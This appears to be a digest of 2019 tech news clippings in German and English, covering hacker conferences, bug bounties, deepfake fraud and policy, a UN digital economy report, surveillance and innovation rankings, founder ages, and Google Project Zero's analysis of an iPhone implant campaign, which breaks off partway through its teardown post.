Der Hauptpreis des diesjährigen Capture-the-Flag-(CTF)-Wettbewerbs im Car Hacking Village war zwar ein Tesla Model S, der Hersteller trat aber nicht als Sponsor auf. Nachvollziehbar, da die Sieger des Wettbewerbs das an sich brandneue Auto nicht ohne Gebrauchsspuren mitnehmen durften: Die Teams würfelten während des Wettstreits um Punkte. Würfelte ein Teilnehmer beispielsweise eine 3, durfte er dem Auto einen Schlag mit einem Hammer verpassen. Eine 6 bedeutete die Chance, eine Bowlingkugel auf die Motorhaube zu donnern.

Warum? Die CTF-Ausrichter erklärten es so: „Wenn man die Chance hat, etwas zu tun, das man sonst nie tun würde, dann muss man sie ergreifen“. Diese Aussage bezog sich offenbar sowohl auf die Chance, den Tesla zu hacken, als auch darauf, ihn zu demolieren, mit unzähligen Aufklebern zu verzieren oder mit Lippenstift-Abdrücken zu übersäen. Der Gewinner bekam letztlich die Schlüssel für ein, so die Veranstalter, „einzigartiges Fahrzeug mit Patina und Geschichte“ – und dem Wettbewerb war die Aufmerksamkeit von Besuchern und Presse sicher.

Ohne Auto im Gepäck, dafür aber mit Hackern auf der Bühne, präsentierte sich BMW. Offensichtlich fremdelt der Autobauer nicht, wenn es um Kontakte zur Hacker-Gemeinde geht: BMW-Vertreter hielten gemeinsam mit Sicherheitsexperten der Tencent Keen Labs einen Vortrag auf der Black Hat. Darin ging es um teils aus der Ferne ausnutzbare Lücken in BMWs „ConnectedDrive“-Software, die Tencent 2018 entdeckte. Das chinesische Unternehmen hatte BMW anschließend geholfen, sie zu beheben.

Auch in Sachen Bug Bountys gab es Neuigkeiten während der Black Hat und DEF CON: Apple zahlt Bugfindern jetzt bis zu eine Million US-Dollar für Sicherheitslücken, die das Ausführen von Kernel-Code aus der Ferne ohne Zutun des Nutzers erlauben und zusätzlich einen Neustart des verwundbaren Systems überstehen.

Microsoft nutzte die Black Hat, um Neuigkeiten rund um seine Bug-Bounty-Programme anzukündigen: Die Redmonder zahlen jetzt bis zu 300.000 US-Dollar für Schwachstelleninformationen, die die Cloud-Plattform Azure betreffen. Im eigens dafür eingerichteten Azure Security Lab können Hacker die produktiv eingesetzte Azure-Infrastruktur angreifen, ohne den Live-Betrieb und damit Kundendaten zu gefährden – online und zeitlich unabhängig von Events wie Black Hat oder DEF CON.

Weniger offen für eine Zusammenarbeit zeigte sich ausgerechnet Flugzeughersteller Boeing, der seit Monaten wegen Sicherheitsmängeln an seinen Flugzeugen in der Kritik steht. Nachdem der Security-Fachmann Rubens Santamarta Boeing auf etliche Schwachstellen und schlampig programmierte Passagen in der Firmware einer wichtigen Netzwerkkomponente des Langstreckenfliegers 787 („Dreamliner“) aufmerksam gemacht hatte, nahm der Hersteller zwar den Dialog auf. Am Ende servierte er Santamarta aber mit dem Kommentar ab, die Lücken nicht reproduzieren zu können – ohne ihm die Gelegenheit zu bieten, seine Entdeckungen vor Ort mit Ingenieuren zu diskutieren.

Der Chief Information Security Officer einer europäischen Fluglinie sagte im Gespräch mit c’t, dass ihm dieses Verhalten unverständlich sei: „Wenn mir jemand einen Bug meldet und ich ihn nicht reproduzieren kann, dann tue ich doch alles, um die Schritte des Forschers nachvollziehen zu können“.

Gegenüber der US-Presse erklärte Boeing, dass die von Santamarta entdeckten Lücken zwar vorhanden, aber nicht ausnutzbar seien. Einen Beleg hierfür blieb das Unternehmen aber schuldig.

Problematisch gestaltete sich laut Daniel Romero und Mario Rivas von der Cyber-Security-Firma NCC Group auch die Kommunikation mit diversen Druckerherstellern. Die Hacker hatten sich mittels automatisierter Penetrationstests die Firmware von Brother-, HP-, Kyocera-, Lexmark-, Ricoh- und Xerox-Druckern vorgenommen und binnen kurzer Zeit 50 teils schwerwiegende Bugs gefunden.

Die Kommunikation im Rahmen des Responsible-Disclosure-Prozesses verlief größtenteils schleppend: Einige Hersteller reagierten erst nach Monaten auf die Kontaktaufnahme durch die Forscher. Kyocera und Ricoh haben auch ein halbes Jahr später noch keine Sicherheitsupdates veröffentlicht.

Für 2020 hat Will Roper von der Air Force noch größere Pläne, als er sie im Rahmen der DEF CON 27 umgesetzt hat: Während der nächsten Konferenz will er ausgewählte Hacker in einen Luftwaffenstützpunkt nahe Las Vegas bringen und sie dort auf alle digitalen Systeme eines echten Kampfjets loslassen. Wahlweise soll auch das Kontrollsystem von Militärsatelliten im Angebot sein.

„Mir ist es lieber, wenn Hacker die Bugs vorab finden, bevor wir die Systeme in eine Gefechtssituation bringen“, sagt Roper. Damit beweist er eine Einstellung gegenüber White-Hat-Hackern, die Organisationen und Unternehmen im Hinblick auf noch unentdeckte Bugs künftig eine Menge Zeit und Risiko sparen könnte – und die sich langsam, aber stetig durchzusetzen scheint.






Thieves Used Audio Deepfake of a CEO to Steal $243,000

The heist is just a preview of how unprepared we are for AI-powered cybercrime.

In what may be the world’s first AI-powered heist, synthetic audio was used to imitate a chief executive’s voice and trick his subordinate into transferring over $240,000 into a secret account, The Wall Street Journal reported last week.

The company’s insurer, Euler Hermes, provided new details to the Washington Post on Wednesday but refused to name the company involved. The company’s managing director was called late one afternoon and his superior’s voice demanded the subordinate wire money to a Hungarian account to save on “late-payment fines”, sending the financial details over email while on the phone. A spokeswoman from Euler Hermes said, “The software was able to imitate the voice, and not only the voice: the tonality, the punctuation, the German accent.”

The thieves behind the voice would call back to demand a second payment, which raised the managing director’s suspicions and led to him calling his boss directly. In an email to Euler Hermes, the director said that the synthetic “‘Johannes’ was demanding to speak to me whilst I was still on the phone to the real Johannes!”

Over the past few years, deepfakes have been growing increasingly sophisticated. Online platforms fail to detect it, and companies struggle with how to handle the resulting fallout. The constant evolution of deepfakes means that simply detecting them will never be enough due to the nature of the modern internet, which guarantees it an audience by monetizing attention and fostering the production of viral content. This past June, convincing deepfakes of Mark Zuckerberg were published to Instagram and kept up shortly after Facebook refused to delete a manipulated video of Nancy Pelosi. There is still no clear consensus on how Facebook should’ve handled that situation or future ones.

All of this is exaggerated by the data monetization models of companies like Facebook and Google. Techno-sociologist Zeynep Tufecki warns that companies like Facebook rely on creating a “persuasion architecture” that “make us more pliable for ads [while] also organizing our political, personal and social information flows.” That core dynamic, combined with the constant evolution of deepfake technology, means this problem will likely get worse across all online platforms unless the companies behind them can be convinced to change their business models.



A Site Faking Jordan Peterson’s Voice Shuts Down After Peterson Decries Deepfakes

The maker of, a Jordan Peterson Voice simulator that used AI to match his voice to any text inputs, took the website down, after the real Peterson freaked out.

by Samantha Cole

The owner of, a website for generating convincing clips of Jordan Peterson saying whatever you want using AI, shut down their creation this week after the real Peterson announced his displeasure and raised the possibility of legal action.

While the site was up, a 21-second recording greeted visitors to the site, saying in Peterson’s voice, “This is not Jordan Peterson. In fact, I’m a neural network designed to sound like Dr. Peterson.”

The clip implored the visitor to type some text into a box, that would be fed into a neural network trained on hours of Peterson’s actual voice, and generated into audio that sounded a lot like the real thing.

“The Deep Fake artists need to be stopped, using whatever legal means are necessary, as soon as possible.”

Several media outlets tested the program and published the results, making him pantomime feminist texts and vulgarities. Aside from the outrageous content, the results sounded a lot like the real thing.

It turns out that Peterson—a controversial Canadian professor known for his lectures defending the patriarchy and denying the existence of white privilege while decrying “postmodern neo-Marxists,”—did not find flattering.

“Something very strange and disturbing happened to me this week,” Peterson wrote on his website. “If it was just relevant to me, it wouldn’t be that important (except perhaps to me), and I wouldn’t be writing this column about it. But it’s something that is likely more important and more ominous than we can even imagine.”

He then goes on to spend over 1,300 words decrying deepfakes—algorithmically-generated face-swapped videos, not fake audio but sometimes combined with fake voices—as a threat to politics, personal privacy, and veracity of evidence, and ends with a vague allusion toward making fake audio and video illegal. Or, possibly, suing creators.

“Wake up. The sanctity of your voice, and your image, is at serious risk,” he wrote. “It’s hard to imagine a more serious challenge to the sense of shared, reliable reality that keeps us linked together in relative peace. The Deep Fake artists need to be stopped, using whatever legal means are necessary, as soon as possible.”

After Peterson published this blog post, the NotJordanPeterson website shut down operations. “In light of Dr. Peterson’s response to the technology demonstrated by this site … and out of respect for Dr. Peterson, the functionality of the site will be disabled for the time being,” the site owner wrote.

The site owner told Motherboard that despite Peterson’s hinting at legal action in his blog, Peterson isn’t suing him, and he took NotJordanPeterson down after he saw his negative reaction. At the time of publication, Peterson has not responded to Motherboard’s request for comment.

It’s interesting to see a public figure like Peterson address deepfakes so directly. Plenty of other celebrities have been subject to the algorithmic face-swap and fake-audio treatment, including podcast host Joe Rogan, Nicholas Cage, and Elon Musk.

The AI models that generate fake video or audio rely on a huge amount of existing data to analyze and “learn” from. As it happens, refusing to shut the fuck up—as so many powerful men are wont to—is great training material for an AI algorithm to train a realistic model of someone on.

Before Peterson, the closest any powerful men have come to commenting on deepfakes as a phenomenon is Mark Zuckerberg, after an artist created a deepfake of him saying some insidious things. The media coverage of that satirical art project forced his platform to enact policies around handling fake video content.

But what Peterson is implying in this screed—that deepfakes, even as art, should be stopped, banned, and otherwise made illegal—is something legislators and AI ethicists have grappled with since the dawn of deepfakes two years ago. Many experts say that regulating deepfakes is a bad idea, because trying to do so could chill First Amendment rights and free speech online.

Peterson mentions Rep. Yvette Clark’s proposed DEEPFAKES Accountability Act as a potential solution to his embarrassment, and what he sees as the dangers of deepfakes as a whole. The Electronic Frontier Foundation notes that in that bill, “while there is an exception for parodies, satires, and entertainment—so long as a reasonable person would not mistake the ‘falsified material activity’ as authentic—the bill fails to specify who has the burden of proof, which could lead to a chilling effect for creators.”

As a big fan of free speech, Peterson of all people should be wary of suggesting we sue the pants off anyone who makes an unflattering mimicry of us online. If he really wants to do something to combat the real dangers of deepfakes, he could start with advocating for improving the legislation that does exist to get help for victims of revenge porn and non-consensual nudes. Those are the people who are really impacted by harassment and intimidation online.


There Is No Tech Solution to Deepfakes

Funding technological solutions to algorithmically-generated fake videos only puts a bandage on the deeper issues of consent and media literacy.

Every day, Google Alerts sends me an email rounding up all the recent articles that mention the keyword “deepfake.” The stories oscillate between suggesting deepfakes could trigger war and covering Hollywood’s latest quirky use of face-swapping technology. It’s a media whiplash that fits right in with the rest of 2018, but this coverage frequently misses what we should actually fear most: A culture where people are fooled en masse into believing something that isn’t real, reinforced by a video of something that never happened.

In the nine months since Motherboard found a guy going by the username “deepfakes” posting face-swapped, algorithmically-generated porn on Reddit, the rest of the world rushed straight for the literal nuclear option: if nerds on the internet can create fake videos of Gal Gadot having sex, then they can also create fake videos of Barack Obama, Donald Trump, and Kim Jong Un that will somehow start an international incident that leads to nuclear war. The political implications of fake videos are so potentially dangerous that the US government is funding research to automatically detect them.

In April, the US Defense Advanced Research Projects Agency (DARPA)’s Media Forensics department awarded nonprofit research group SRI International three contracts to find ways to automatically detect digital video manipulations. Researchers at the University at Albany received funding from DARPA to study deepfakes, and found that analyzing the blinks in videos could be one way to detect a deepfake from an unaltered video.

The worry that deepfakes could one day cause a nuclear war is a tantalizing worstcase scenario, but it skips right past current and pressing issues of consent, media literacy, bodily autonomy, and ownership of one’s own digital self. Those issues are not far-fetched or theoretical. They are exacerbated by deepfakes today. Will someone make a fake video of President Donald Trump declaring war against North Korea and get us all killed? Maybe. But the end of humanity is the most extreme end result, and it’s getting more attention than issues around respecting women’s bodies or assessing why the people creating deepfakes felt entitled to using their images without permission to begin with.

Until we grapple with these deeply entrenched societal issues, DARPA’s technical solutions are bandages at best, and there’s no guarantee that they will work anyway.

To make a believable deepfake, you need a dataset comprised of hundreds or thousands of photos of the person’s face you’re trying to overlay onto the video. The solution proposed by researchers at the University at Albany assumes that these photos, or “training datasets,” probably don’t include enough images of the person blinking. The end result is a fake video that might look convincing, but where people don’t blink naturally.

But even those researchers concede that this isn’t a totally reliable way to detect deepfakes. Siwei Lyu, a professor at the State University of New York at Albany, told MIT Technology Review that a quality deepfake could get around the eye-blinking detection tool by collecting images in the training dataset that show the person blinking.

Lyu told MIT Tech Review that his team has an even better technique for detecting deepfakes than blinks, but declined to say what it is. “I’d rather hold off at least for a little bit,” Lyu says. “We have a little advantage over the forgers right now, and we want to keep that advantage.”

This exemplifies the broader problem with trying to find a technical solution to the deepfakes problems: as soon as someone figures out a way to automatically detect a deepfake, someone will find a way around it. Platforms are finding out that it’s not as easy as block a keyword or ban a forum to combat fake porn showing up on their sites. Image host Gfycat, for example, thought it could use automated tools to detect algorithmically-generated videos on its platform and kick them off, but months after it announced this effort, we still found plenty of deepfakes hosted there.

The algorithms themselves will, by design, stay locked in a cat-and-mouse game of outdoing each other. When one solution for detection pops up—like the blinks—the other will learn from it, and match it. We’ve seen this happen with bots that are continually getting better at solving CAPTCHAs, forcing bot-detection systems to make the CAPTCHAs more difficult to solve, which the bots learn to beat, and so, on infinitely.

This doesn’t mean that we should throw our hands up and stop trying to find tech solutions to complex problems like deepfakes. It means that we need to recognize the limitations of these solutions, and to continue to educate people about technology and media, when to trust what they see, and when to be skeptical.

Florida senator Marco Rubio got it right when he talked about deepfakes at a Heritage Foundation forum last month: “I think the likely outcome would be that [news outlets] run the video, with a quotation at the end saying, by the way, we contacted senator so-and-so and they denied that that was them,” he said, talking about a hypothetical scenario where a deepfake video could spread as a news tip to journalists. “But the vast majority of the people watching that image on television are going to believe it.”

Fake news isn’t new, and malicious AI isn’t new, but the combination of the two, plus a widespread destabilized trust in media is only going to erode our sense of reality even more.

This isn’t paranoia. We saw a small glimpse of this with the spoof video that Conservative Review network CRTV made of Alexandria Ocasio-Cortez about a month after she won the Democratic congressional nomination in New York. CRTV cut together a video of Ocasio-Cortez giving an interview to make it seem like she bombed it. This wasn’t a deepfake by any means—it was rudimentary video editing. Still, more than one million people viewed it and some people fell for it. If you already thought poorly of Ocasio-Cortez, the video could reinforce your beliefs.

If people are gullible enough to believe in conspiracy theories—so much so that they show up at Trump rallies with signs and shirts supporting QAnon—we don’t need AI to fool anyone into believing anything.

The first headline we published for a deepfakes story, back in December, said: “AI-Assisted Fake Porn Is Here and We’re All Fucked.” We stand by that. We are still deeply fucked. Not because a deepfake is going to lead to nuclear war, but because we have so many problems we need to solve before we worry about advanced detection of AI-generated video.

We need to figure out how platforms will moderate users spreading malicious uses of AI, and revenge porn in general. We have to solve the problems around consent, and the connection between our bodily selves and our online selves. We need to face the fact that debunking a video as fake, even if it’s proven by DARPA, won’t change someone’s mind if they’re seeing what they already believe. If you want to see a video of Obama saying racist things into a camera, that’s what you’ll see—regardless of whether he blinks.

The Department of Defense can’t save us. Technology won’t save us. Being more critically-thinking humans might save us, but that’s a system that’s lot harder to debug than an AI algorithm.


This Program Makes It Even Easier to Make Deepfakes

Unlike previous deepfake methods, FSGAN can generate face swaps in real time, with zero training.

A new method for making deepfakes creates realistic face-swapped videos in real-time, no lengthy training needed.

Unlike previous approaches to making deepfakes—algorithmically-generated videos that make it seem like someone is doing or saying something they didn’t in real life—this method works on any two people without any specific training on their faces.

Most of the deepfakes that are shared online are created by feeding an algorithm hundreds or thousands of images of a specific face. The algorithm “trains” on that specific face so it can swap it into the target video. This can take hours or days even with access to expensive hardware, and even longer with consumer-grade PC components. A program that doesn’t need to be trained on each new target is another leap forward in making realistic deepfakes quicker and easier to create.

“Our method can work on any pair of people without specific training,” the researchers said in a video presenting their method. “Therefore, we can produce real-time results on unseen subjects.”

Researchers from Bar-Ilan University in Israel and the Open University of Israel posted their paper, “FSGAN: Subject Agnostic Face Swapping and Reenactment,” to the arXiv preprint server on Friday. On their project page, the researchers write that the open-source code is impending; in the paper, they say that they’re publishing the details of this program because to suppress it “would not stop their development,” but rather leave the public and policymakers in the dark about the potential misuse of these algorithms.

In a video demonstrating the FSGAN program, the researchers show how it can overcome hair and skin tone to swap faces seamlessly:


Similar to how the single-shot method developed by Samsung AI used landmarks on the source and target’s faces to map the Mona Lisa’s face to make her “speak,” FSGAN pinpoints facial landmarks, then aligns the source face to the target’s face.

The FSGAN program itself wasn’t cheap or easy to make: The researchers say in their paper that it required eight Nvidia Tesla v100 GPU processors—which can cost around $10,000 each for consumers—to train the generative adversarial network that the program then uses to create deepfakes in real-time.

On their project website, the researchers say that the project code will eventually be available on GitHub, a platform for open-source code development. Assuming the researchers make a pre-trained AI model available, it’s likely that using it at home won’t be as resource-intensive as it was to train it from scratch in a lab.

“Our method eliminates laborious, subject specific data collection and model training, making face swapping and reenactment accessible to non-experts,” the researchers wrote. “We feel strongly that it is of paramount importance to publish such technologies, in order to drive the development of technical counter-measures for detecting such forgeries, as well as compel lawmakers to set clear policies for addressing their implications.”

Uno-Bericht: 7 Plattformen beherrschen den Weltmarkt

GAFA, Microsoft, Tencent, Alibaba.

Laut dem erstmals erstellten „Digital Economy Report 2019“ der Uno dominieren sieben Plattformen aus den USA und China den weltweiten Markt, darunter Microsoft, Amazon und Alibaba.

Die weltweite Digitalwirtschaft wird von sieben Internet- und Tech-Konzernen aus den USA und China sowie deren Plattformen dominiert. Das hat der erstmals erstellte „Digital Economy Report 2019“ ergeben, den die Uno am Mittwoch vorgestellt hat. Die Uno spricht dabei von sogenannten „Superplattformen“, auf die zwei Drittel des weltweiten Marktes entfallen sollen, wie berichtet. Bei diesen Plattformen handelt es sich der Uno-Studie zufolge um Microsoft, Apple, Amazon, Google und Facebook sowie Tencent und Alibaba.

China und USA: 90 Prozent Marktanteil an digitaler Wirtschaft

Noch größer wird die Kluft zwischen US- und chinesischen Konzernen und dem Rest der Welt, wenn man alle Internetplattformen in die Rechnung einbezieht. Dann sollen laut Uno die großen Konzerne aus den USA und China auf einen weltweiten Marktanteil von 90 Prozent kommen. Europäische Unternehmen kommen auf gerade einmal vier Prozent. Die übrigen sechs Prozent verteilen sich auf alle übrigen Länder der Welt. Die Uno forderte vor diesem Hintergrund zu globalen Anstrengungen auf, um diesen Zustand zu ändern.

Dazu gehört laut Uno-Generalsekretär Antonio Guterres auch, dass mehr als die Hälfte der Welt keinen oder nur einen geringen Zugang zum Internet hat. Es müsse daran gearbeitet werden, „diese digitale Kluft schließen“. Interessanterweise arbeiten derzeit gerade große US-Plattformen sowie chinesische Konzerne daran, das Internet in ländliche und entlegene Gebiete zu bringen. Während die US-Tech-Riesen Facebook, Amazon und Google dies mithilfe von Ballons, Drohnen oder Satelliten schaffen wollen, setzt China auf das Infrastrukturprojekt „Digitale Seidenstraße“.

Drei viertel aller Blockchain-Patente stammen aus China oder den USA

Neben dem 90-prozentigen Marktanteil bei den großen digitalen Konzernen sieht die Uno-Studie auch in weiteren Bereichen eine Dominanz von China und den USA. So verantworten die beiden Länder 75 Prozent aller Blockchain-Patente sowie mehr als 75 Prozent des weltweiten Cloud-Marktes. Zudem stammen rund die Hälfte der weltweiten Ausgaben für das Internet der Dinge aus China und den USA, wie Xinhua schreibt.



local copy:

original link:


UN Digital Economy Report 2019

Value Creation and Capture: Implications for Developing Countries


The rapid spread of digital technologies is transforming many economic and social activities. While creating many new opportunities, widening digital divides threaten to leave developing countries, and especially least developed countries, further behind. A smart embrace of new technologies, enhanced partnerships and greater intellectual leadership are needed to redefine digital development strategies and the future contours of globalization.

This first edition of the Digital Economy Report – previously known as the Information Economy Report − examines the scope for value creation and capture in the digital economy by developing countries. It gives special attention to opportunities for these countries to take advantage of the data-driven economy as producers and innovators – but also to the constraints they face – notably with regard to digital data and digital platforms.

Digital advances have already led to the creation of enormous wealth in record time, but this is highly concentrated in a small number of countries, companies and individuals. Meanwhile, digitalization has also given rise to fundamental challenges for policymakers in countries at all levels of development. The Report presents recent trends and discusses key policies for value creation and capture in the digital economy, notably with regards to entrepreneurship, data, trade, competition, taxation, intellectual property and employment.

These are early days in the digital era and there are still more questions than answers about how to deal with the digital challenge. Given the absence of relevant statistics and empirical evidence, as well as the rapid pace of technological change, decision-makers face a moving target when trying to adopt sound policies relating to the digital economy. The Report provides valuable insights and analyses to support policymakers at the national and international levels to ensure that no one is left behind by the fast-evolving digital economy.




CCTV: die bestüberwachten Städte Europas

von  on 05.09.2019

Berlin wird laut einer Erhebung von Comparitech durch fast 40.000 Kameras überwacht – das sind etwa 11,2 Kameras pro 1.000 Einwohner. Damit liegt die Bundeshauptstadt auf Platz 2 im Ranking der bestüberwachten Städte Europas; weltweit liegt Deutschlands größte Stadt auf Platz 19. Im Vergleich mit London hat Berlin indes noch reichlich Luft nach oben bei der Überwachung des öffentlichen Raumes. An der Themse verfolgen rund 630.000 Kameras, was die 9,6 Millionen Einwohner so treiben – das sind 68,4 Kameras auf 1.000 Einwohner.

Die bestüberwachten Städte der Welt liegen übrigens allesamt in China. Auf Platz 1 liegt das am Zusammenfluss von Jangtsekiang und Jialing gelegene Chongqing mit 168 Kameras je 1.000 Einwohner.





Die 10 innovativsten Volkswirtschaften der Welt

von  am 05.09.2019

Krebsforschung, Fleischersatzprodukte und Smart-Home-Technologien zählen zu den großen Entwicklungen unserer Zeit. Doch welche Länder sind weltweit führend bei Forschung und Entwicklung? Ein aktuelles Bloomberg-Ranking zeigt die innovativsten Länder nach Indexwert. Darin steht Deutschland auf dem zweiten Platz.

In dem Ranking wurden Faktoren wie die Forschungs- und Entwicklungsausgaben, die Anzahl der inländischen Patentanmeldungen und die Zahl der inländischen öffentlichen High-Tech-Unternehmen mit einbezogen. Auf Rang eins landete wie bereits im Vorjahr Südkorea, mit einem Indexwert von 87,38 von 100 möglichen Punkten, wie die Statista-Grafik zeigt. Deutschland liegt nur knapp dahinter mit einem Wert von 87,30. Ebenfalls unter den Top 5 steht die Schweiz, die in diesem Jahr den vierten Platz der innovativsten Volkswirtschaften belegt.





Youth Myth: Founders of Successful Tech Companies Are Mostly Middle-Aged

Aug. 29, 2019

It took an entrepreneur to reimagine the mundane home thermostat as an object of beauty — and then to make a fortune based on that vision.

The entrepreneur was Tony Fadell, who had that thermostat epiphany after decades in the tech industry, including at companies like Apple. Mr. Fadell embodied his idea in a new company, Nest, which he started with the help of a colleague from Apple in 2010, at age 41.

The Nest thermostat had a sleek and intuitive design, smartphone connectivity and the ability to learn its owner’s temperature-setting habits. The product was a big hit, and within a few years Google acquired Nest for $3.2 billion.

Mr. Fadell’s deep experience and relatively mature age when he started Nest are typical of superstar entrepreneurs, who are rarely fresh out of college — or freshly dropped out of college. That’s what a team of economists discovered when they analyzed high-growth companies in the United States. Their study is being published in the journal American Economic Review: Insights.

The researchers looked at start-ups established between 2007 and 2014 and analyzed the top 0.1 percent — defined as those with the fastest growth in employment and sales. The average age of those companies’ founders was 45.

There are, of course, famous counterexamples. Mark Zuckerberg was 19 when he co-founded Facebook. Bill Gates was 19 when he founded Microsoft with Paul Allen. Steve Jobs was 21 when he founded Apple with Steve Wozniak. The origin stories of those companies and a handful of others helped to shape a myth that tech, and American innovation overall, is fueled by wunderkinds. But fresh-faced founders are the exception, not the rule, according to the study.

The research, by the economists Pierre Azoulay of M.I.T., Ben Jones of Northwestern, J. Daniel Kim of the University of Pennsylvania and Javier Miranda of the United States Census Bureau, provides the first systematic calculation of the ages of the founders of high-growth start-ups in the United States.

Previous studies had documented that owners of small businesses tended to be in their late 30s and 40s. But most small businesses stay fairly small: restaurants, dry cleaners, retail stores and the like. They are important but aren’t central to innovation in the economy.

The new study was able to zero in on high-flying start-ups by bringing together anonymized data collected by different agencies within the federal government. The government matched sales and employment data for start-ups collected by the Census Bureau with information on the founders extracted from Internal Revenue Service filings.

After stripping identifying information, the government provided the researchers with a data set including 2.7 million business founders. The researchers calculated that the founders’ average age was 42. And for the founders of the 0.1 percent fastest-growing firms, the average age was 45. Firms that were successful enough to have an initial public offering or be acquired by a larger company showed the same pattern: Their founders were generally middle-aged.

Steve Jobs in 1977. He was 21 when he co-founded Apple.

That isn’t to say that youth has no advantages.

Younger people often have a risk-taking mind-set and that might help them develop game-changing ideas. In addition, raw problem-solving ability — what psychologists call fluid intelligence — seems to peak early. It may already be declining by the time we’re in our 20s.

Still, the findings on age and entrepreneurship echo earlier myth-busting by researchers about scientific breakthroughs. While Albert Einstein did pathbreaking work on special relativity and the photoelectric effect at 26, such early discoveries aren’t typical. A study of Nobel laureates in physics over the 20th century found that those scientists did their prizewinning work at an average age of 37.

In applied science, crystallized intelligence, gained through experience, appears to be even more vital: Nobel-worthy breakthroughs in medicine arrived a bit later, at age 40, on average.

In short, entrepreneurial success isn’t just a function of raw intelligence and a propensity for risk-taking. It depends on a variety of ingredients, many of which appear to improve with age.

Consider Mr. Fadell’s story.

He started working in Silicon Valley in the early 1990s, designing products at General Magic and Philips Electronics. In the 2000s he moved to Apple, where he led the engineering team that created the iPod digital music player, and played a crucial role in the development of the early iPhone. In 2010, after amassing all that experience, he founded Nest with Matt Rogers, a young Apple engineer.

In an interview, Mr. Fadell recounted how, after he left Apple, he and his family traveled the world and designed an eco-friendly home for themselves in Lake Tahoe. He said he was dissatisfied with the clunky thermostats offered by his contractor or visible during his travels.

“Thermostats were ugly, outdated, and didn’t help you save money or keep you comfortable,” Mr. Fadell said. He recalls thinking: “There’s something fundamentally wrong here and there’s no product in the market to address it.” So he created a new thermostat and a new company.

Mr. Fadell said he had tried to start successful companies in college and earlier in his career but they failed because he wasn’t ready.

“There were a lot of things I needed to learn to finally be able to nail it,” he said. He learned about product design at General Magic, he said, and about managing teams and financing at Philips Electronics. At Apple, he said, Mr. Jobs showed him how to go beyond designing a product; the key, Mr. Fadell said, was to design the customer’s whole experience, from packaging to messaging.

When he needed to recruit a team for Nest, he said, he was already a Silicon Valley veteran. “I’d been in the Valley for 20 years so I had a huge network of people I’d worked with before,” he said.

His thinking, as an older man, was different, too. In his 20s, he said, he was barely aware of thermostats. “College students know what college students need,” he said. “When you get older, you start to need and understand other things.”

A lot of innovation in business benefits from experience. Youth has its triumphs, but some roads to success are lengthy. They require age and staying power.





Google Project Zero: iPhones konnten jahrelang gehackt werden

Um ein iPhone zu infizieren, genügte es, eine manipulierte Webseite zu besuchen.

Unbemerkt beim Surfen

Googles Sicherheitsforscher finden heraus, dass iPhones jahrelang über manipulierte Webseiten gehackt und ausspioniert werden konnten. Die Angreifer hatten dabei praktisch volle Kontrolle über die Geräte und konnten nach Belieben Dateien, Fotos, Chats oder Zugangsdaten abgreifen.

Googles Project Zero hat Anfang des Jahres mehrere manipulierte Webseiten gefunden, über die es möglich war, iPhones mit Malware zu infizieren. Über sogenannte Implants war es den Angreifern nicht nur möglich, Daten oder Fotos zu kopieren und den Standort abzurufen. Sie hatten vollen Zugriff auf alle Bereiche der Geräte und konnten auch Nachrichten von Ende-zu-Ende-verschlüsselten Messengern wie iMessage, Whatsapp oder Telegram aus dem Code auslesen. Auch E-Mail-Apps waren für die Angreifer offene Bücher, und sie konnten sogar gespeicherte Zugangsdaten und Anmelde-Tokens aus dem iCloud-Schlüsselbund stehlen.

Kompliziert und teuer

Insgesamt machten die Sicherheitsforscher 14 Schwachstellen aus, die die Hacker für fünf Angriffsketten ausnutzten. Da die sogenannten Exploits ziemlich kompliziert sind und bei iPhones auf dem Schwarzmarkt sehr teuer gehandelt werden, vermutet das Project-Zero-Team, dass sie möglicherweise Geheimdiensten dazu dienten, bestimmte Bevölkerungsgruppen auszuspionieren. Dabei genügte es, die manipulierten Webseiten zu besuchen, eine weitere Aktion seitens der Opfer war nicht nötig, um das Implant zu platzieren.

Die Forscher gehen davon aus, dass die Kampagne mindestens zwei Jahre lang lief und Apples Betriebssystem von iOS 10 bis zu iOS 12 verwundbar war. Google informierte Apple am 1. Februar mit einer siebentägigen Frist, bis die Problematik öffentlich gemacht worden wäre. Apple veröffentlichte daraufhin am 7. Februar das Update auf iOS 12.1.4, um die Schwachstellen zu schließen. Die Forscher weisen darauf hin, dass mindestens eine der fünf Angriffsketten am Tag der Entdeckung noch nicht gepatched war, also ein sogenannter Zero-Day-Exploit war.

Gefahr nicht gebannt

Projektleiter Ian Peer schreibt, die Angreifer könnten immer noch großen Schaden anrichten, da sie ja immer noch im Besitz der erbeuteten Zugangsdaten und -Tokens seien. Außerdem sollte man sich im Klaren darüber sein, dass es mit großer Wahrscheinlichkeit noch ähnliche Hacker-Kampagnen gäbe, die bisher noch nicht entdeckt worden seien. Schutzmaßnahmen seien niemals ausreichend, wenn man zum Ziel erklärt wurde, schreibt Beer. Es könne genügen, einfach nur in einer bestimmten Region zu leben oder einer bestimmten ethnischen Gruppe anzugehören.

Dies sollte man immer im Hinterkopf behalten und sich entsprechend verhalten, rät Peer. Wenn Nutzer ihre Smartphones in ihr Leben integrierten und ihnen alles anvertrauten, könnten diese Informationen unter Umständen in einer Datenbank landen und gegen sie verwendet werden. Im konkreten Fall konnten Nutzer eines gekaperten iPhone die Spione ganz simpel durch einen Neustart loswerden. Das wird nicht immer so einfach sein.

Quelle:, kwe



Thursday, August 29, 2019

Implant Teardown

Posted by Ian Beer, Project Zero

In the earlier posts we examined how the attackers gained unsandboxed code execution as root on iPhones. At the end of each chain we saw the attackers calling posix_spawn, passing the path to their implant binary which they dropped in /tmp. This starts the implant running in the background as root. There is no visual indicator on the device that the implant is running. There’s no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system.

The implant is primarily focused on stealing files and uploading live location data. The implant requests commands from a command and control server every 60 seconds.

Before diving into the code let’s take a look at some sample data from a test phone running the implant and communicating with a custom command and control server I developed. To be clear, I created this test specifically for the purposes of demonstrating what the implant enabled the attacker to do and the screenshots are from my device.  The device here is an iPhone 8 running iOS 12.

The implant has access to all the database files (on the victim’s phone) used by popular end-to-end encryption apps like Whatsapp, Telegram and iMessage. We can see here screenshots of the apps on the left, and on the right the contents of the database files stolen by the implant which contain the unencrypted, plain-text of the messages sent and received using the apps:





Here’s a conversation in Google Hangouts for iOS and the corresponding database file uploaded by the implant. With some basic SQL we can easily see the plain text of the messages, and even the URL of the images shared.

The implant can upload private files used by all apps on the device; here’s an example of the plaintext contents of emails sent via Gmail, which are uploaded to the attacker’s server:


The implant also takes copies of the user’s complete contacts database:

And takes copies of all their photos:

Real-time GPS tracking:
